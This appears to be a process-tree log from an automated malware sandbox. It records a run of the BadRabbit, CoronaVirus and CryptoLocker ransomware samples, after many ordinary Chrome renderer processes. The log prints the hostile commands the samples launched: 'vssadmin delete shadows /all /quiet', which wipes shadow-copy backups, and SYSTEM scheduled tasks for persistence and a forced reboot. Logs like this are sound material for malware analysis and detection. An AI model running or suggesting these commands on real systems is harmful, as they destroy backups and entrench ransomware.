                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=10096,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10084 /prefetch:1
                                                                                              2⤵
                                                                                                PID:1900
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=10140,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10508 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:1096
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=10636,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10648 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:8
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=10656,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10784 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:2484
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=10812,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10924 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:5340
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=10972,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10992 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:5380
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=11360,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=11392 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5140
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=11352,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=11592 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:4648
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=11576,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=11044 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4028
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=11596,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9892 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4408
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=11616,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9912 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:2944
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=9868,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10292 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:5404
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=9920,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10256 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:832
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=10004,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=11656 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:3628
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=9764,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=11980 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:316
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=12516,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=12568 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:6560
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=12696,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=12708 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:6592
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=11024,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10964 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:6728
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=2972,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=12872 /prefetch:1
                                                                                                                                  2⤵
                                                                                                                                    PID:6744
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=12992,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13024 /prefetch:1
                                                                                                                                    2⤵
                                                                                                                                      PID:6760
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=11292,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13220 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:6984
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=13168,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13356 /prefetch:1
                                                                                                                                        2⤵
                                                                                                                                          PID:7008
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=13476,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13508 /prefetch:1
                                                                                                                                          2⤵
                                                                                                                                            PID:7024
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=13628,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13660 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:7040
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=13768,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13812 /prefetch:1
                                                                                                                                              2⤵
                                                                                                                                                PID:7064
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=13992,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13228 /prefetch:1
                                                                                                                                                2⤵
                                                                                                                                                  PID:6720
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=14152,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=13032 /prefetch:1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:6940
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=14252,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=14264 /prefetch:1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:536
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=14384,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=14400 /prefetch:1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:7172
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=14544,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=14560 /prefetch:1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:7228
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=14704,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=14720 /prefetch:1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:7284
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=5204,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6148 /prefetch:1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:7656
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=10216,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7872 /prefetch:1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1468
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6152,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7668 /prefetch:8
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:7148
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1112,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7628 /prefetch:8
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:3708
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3676,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7700 /prefetch:8
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  PID:12324
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1660
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3012
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3388
                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7224
                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:7904
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4476
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /c schtasks /Delete /F /TN rhaegal
                                                                                                                                                                            3⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:1952
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /Delete /F /TN rhaegal
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:2540
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1228593593 && exit"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:8000
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1228593593 && exit"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4408
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 05:49:00
                                                                                                                                                                            3⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:8024
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 05:49:00
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:8160
                                                                                                                                                                          • C:\Windows\EDD4.tmp
                                                                                                                                                                            "C:\Windows\EDD4.tmp" \\.\pipe\{B4FD3955-2949-4843-8411-53DDD95ACCB3}
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:8064
                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Drops startup file
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious behavior: RenamesItself
                                                                                                                                                                        PID:6232
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3444
                                                                                                                                                                            • C:\Windows\system32\mode.com
                                                                                                                                                                              mode con cp select=1251
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:10312
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin delete shadows /all /quiet
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:11052
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:10976
                                                                                                                                                                                • C:\Windows\system32\mode.com
                                                                                                                                                                                  mode con cp select=1251
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:11832
                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                    PID:12304
                                                                                                                                                                                • C:\Windows\System32\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:11480
                                                                                                                                                                                  • C:\Windows\System32\mshta.exe
                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:11496
                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe
                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:6852
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:6440
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:7760
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:18456
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:18524
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:18552
